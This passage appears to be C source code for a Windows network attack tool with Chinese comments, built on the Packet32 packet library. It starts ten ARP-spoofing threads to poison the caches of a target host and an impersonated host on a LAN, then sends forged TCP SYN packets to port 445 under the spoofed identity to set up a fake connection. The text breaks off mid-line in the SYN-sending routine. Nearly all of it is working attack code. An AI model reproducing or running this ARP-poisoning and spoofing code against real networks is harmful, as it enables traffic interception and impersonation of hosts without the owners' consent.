#include <winsock2.h>
#include "Packet32.h"
#include <stdio.h>
#pragma comment(lib, "packet.lib")
#pragma comment(lib, "ws2_32.lib")
//下面几个宏是测试用的主机的IP和MAC
#define SIMULATE_MAC "0011111d735a" //伪装主机的MAC地址
#define TARGET_MAC "001111c6f7fe" //目的主机的MAC地址
#define LOCAL_MAC "00e06e41508f" //本机MAC地址
#define TARGET_IP "192.168.0.2" //目的主机的IP
#define SIMULATE_IP "192.168.0.1" //伪装主机的IP
#define NDIS_PACKET_TYPE_DIRECTED 0x0001 //直接模式
#pragma pack(push, 1)
struct ET_HEADER //以太网头部
{
unsigned char eh_dst[6];
unsigned char eh_src[6];
unsigned short eh_type;
};
struct ARP_HEADER //ARP头部
{
unsigned short arp_hdr;
unsigned short arp_pro;
unsigned char arp_hln;
unsigned char arp_pln;
unsigned short arp_opt;
unsigned char arp_sha[6];
unsigned long arp_spa;
unsigned char arp_tha[6];
unsigned long arp_tpa;
};
struct IP_HEADER //IP头部
{
char m_ver_hlen; //4位版本号,4位ip头部长
char m_tos;
USHORT m_tlen;
USHORT m_ident;
USHORT m_flag_frag; //3位标志位(1位未用位,1位DF,1位MF),13位片断偏移量
char m_ttl;
char m_protocol;
USHORT m_cksum;
ULONG m_sIP;
ULONG m_dIP;
};
struct TCP_HEADER //TCP头部
{
USHORT m_sport;
USHORT m_dport;
ULONG m_seq;
ULONG m_ack;
char m_hlen_res4; //4位tcp头部长,6位保留的前4位
char m_res2_flag; //6位保留的后2位,6位标志
USHORT m_win;
USHORT m_cksum;
USHORT m_urp;
};
struct PSD_HEADER //伪头部,计算校验和用
{
ULONG m_saddr; //源地址
ULONG m_daddr; //目的地址
char m_mbz;
char m_ptcl; //协议类型
USHORT m_tcpl; //TCP长度
};
struct TCP_OPTION //TCP选项,发起伪连接时要用来与对方协商
{
USHORT unKnown;
USHORT maxSegSize; //MSS,以太网一般为1460
char no1;
char no2;
USHORT SACK;
};
struct CHEAT_ARP_INFO //ARP欺骗线程的参数
{
char simulateIP[20];
char targetIP[20];
char targetMAC[13];
};
#pragma pack(pop)
USHORT CheckSum(USHORT *buffer, int size); //计算校验和的函数
void StrToMac(char *str,char *mac); //字符串转换为MAC地址
void ListenACK(); //监听函数,监听对方的回包
void AssayAndSendData(LPPACKET lpPacket); //分析数据帧并发送回包
DWORD WINAPI ArpCheat(void *pInfo); //ARP欺骗线程
DWORD WINAPI SendSyn(void *no); //发送SYN包的线程
LPADAPTER lpAdapter=NULL; //适配器指针
USHORT ipID=1638; //IP标识
USHORT sourcePort=1056; //起始源端口
USHORT targetPort=445; //目的端口
int main(int argc, char* argv[])
{
WSADATA wsaData;
if(WSAStartup(MAKEWORD(2,1), &wsaData)!=0)
{
printf("WSAStartup error!\n");
return -1;
}
//打开适配器:
WCHAR adapter_name[2048]={0};
ULONG adapter_length=1024;
//取得所有适配器的名字.
if(PacketGetAdapterNames((char*)adapter_name, &adapter_length)==FALSE)
{
//adapter_name:一个用于存放适配器的名字的缓冲区
//adapter_length:这个缓冲区的大小
printf("PacketGetAdapterNames error:%d\n",GetLastError());
return -1;
}
WCHAR *name1,*name2;
ULONG i;
static CHAR adapter_list[10][1024];
name1=adapter_name;
name2=adapter_name;
i=0;
//把adapter_name中的适配器名字,分别copy到adapter_list[]中,i从0开始为第一个
while((*name1!='\0'|| (*(name1-1)!='\0')))
{
if(*name1=='\0')
{
memcpy(adapter_list,name2,2*(name1-name2));
name2=name1+1;
i++;
}
name1++;
}
//默认打开第一块适配器
lpAdapter=(LPADAPTER)PacketOpenAdapter((LPTSTR)adapter_list[0]);
if (!lpAdapter||(lpAdapter->hFile==INVALID_HANDLE_VALUE))
{
printf("Unable to open the driver, Error Code : %lx\n", GetLastError());
return -1;
}
//创建ARP欺骗线程:
CHEAT_ARP_INFO info1={0},info2={0},info3={0},info4={0},info5={0},info6={0},info7={0},info8={0},info9={0},info10={0};
memcpy(info1.simulateIP,SIMULATE_IP,strlen(SIMULATE_IP));
memcpy(info1.targetIP,TARGET_IP,strlen(TARGET_IP));
memcpy(info1.targetMAC,TARGET_MAC,strlen(TARGET_MAC));
::CreateThread(NULL,0,ArpCheat,&info1,0,NULL);
memcpy(info2.simulateIP,TARGET_IP,strlen(TARGET_IP));
memcpy(info2.targetIP,SIMULATE_IP,strlen(SIMULATE_IP));
memcpy(info2.targetMAC,SIMULATE_MAC,strlen(SIMULATE_MAC));
::CreateThread(NULL,0,ArpCheat,&info2,0,NULL);
memcpy(info3.simulateIP,TARGET_IP,strlen(TARGET_IP));
memcpy(info3.targetIP,SIMULATE_IP,strlen(SIMULATE_IP));
memcpy(info3.targetMAC,SIMULATE_MAC,strlen(SIMULATE_MAC));
::CreateThread(NULL,0,ArpCheat,&info3,0,NULL);
memcpy(info4.simulateIP,TARGET_IP,strlen(TARGET_IP));
memcpy(info4.targetIP,SIMULATE_IP,strlen(SIMULATE_IP));
memcpy(info4.targetMAC,SIMULATE_MAC,strlen(SIMULATE_MAC));
::CreateThread(NULL,0,ArpCheat,&info4,0,NULL);
memcpy(info5.simulateIP,TARGET_IP,strlen(TARGET_IP));
memcpy(info5.targetIP,SIMULATE_IP,strlen(SIMULATE_IP));
memcpy(info5.targetMAC,SIMULATE_MAC,strlen(SIMULATE_MAC));
::CreateThread(NULL,0,ArpCheat,&info5,0,NULL);
memcpy(info6.simulateIP,TARGET_IP,strlen(TARGET_IP));
memcpy(info6.targetIP,SIMULATE_IP,strlen(SIMULATE_IP));
memcpy(info6.targetMAC,SIMULATE_MAC,strlen(SIMULATE_MAC));
::CreateThread(NULL,0,ArpCheat,&info6,0,NULL);
memcpy(info7.simulateIP,TARGET_IP,strlen(TARGET_IP));
memcpy(info7.targetIP,SIMULATE_IP,strlen(SIMULATE_IP));
memcpy(info7.targetMAC,SIMULATE_MAC,strlen(SIMULATE_MAC));
::CreateThread(NULL,0,ArpCheat,&info7,0,NULL);
memcpy(info8.simulateIP,TARGET_IP,strlen(TARGET_IP));
memcpy(info8.targetIP,SIMULATE_IP,strlen(SIMULATE_IP));
memcpy(info8.targetMAC,SIMULATE_MAC,strlen(SIMULATE_MAC));
::CreateThread(NULL,0,ArpCheat,&info8,0,NULL);
memcpy(info9.simulateIP,TARGET_IP,strlen(TARGET_IP));
memcpy(info9.targetIP,SIMULATE_IP,strlen(SIMULATE_IP));
memcpy(info9.targetMAC,SIMULATE_MAC,strlen(SIMULATE_MAC));
::CreateThread(NULL,0,ArpCheat,&info9,0,NULL);
memcpy(info10.simulateIP,TARGET_IP,strlen(TARGET_IP));
memcpy(info10.targetIP,SIMULATE_IP,strlen(SIMULATE_IP));
memcpy(info10.targetMAC,SIMULATE_MAC,strlen(SIMULATE_MAC));
::CreateThread(NULL,0,ArpCheat,&info10,0,NULL);
Sleep(50);
//发送TCP伪连接的SYN数据帧:
::CreateThread(NULL,0,SendSyn,NULL,0,NULL);
ListenACK(); //循环监听数据包
PacketCloseAdapter(lpAdapter); //关闭适配器
::WSACleanup();
return 0;
}
DWORD WINAPI SendSyn(void *no)
{
Sleep(100);
while(TRUE) //循环发送SYN包发起伪连接
{
char s_mac[6]={0},d_mac[6]={0};
char sendSynBuf[128]={0};
ET_HEADER et_header={0};
IP_HEADER ip_header={0};
TCP_HEADER tcp_header={0};
TCP_OPTION tcp_option={0};
PSD_HEADER psd_header={0};
//填充以太头部:
StrToMac(LOCAL_MAC,s_mac); //local_mac
memcpy(et_header.eh_src,s_mac,6);
StrToMac(TARGET_MAC,d_mac); //dest_mac
memcpy(et_header.eh_dst,d_mac,6);
et_header.eh_type=htons(0x0800); //类型为0x0800表示这是IP包
//填充IP头部:
ip_header.m_ver_hlen=(4<<4|5);
ip_header.m_tos=0;
ip_header.m_tlen=htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER)+sizeof(TCP_OPTION));
ip_header.m_ident=htons(ipID++);
ip_head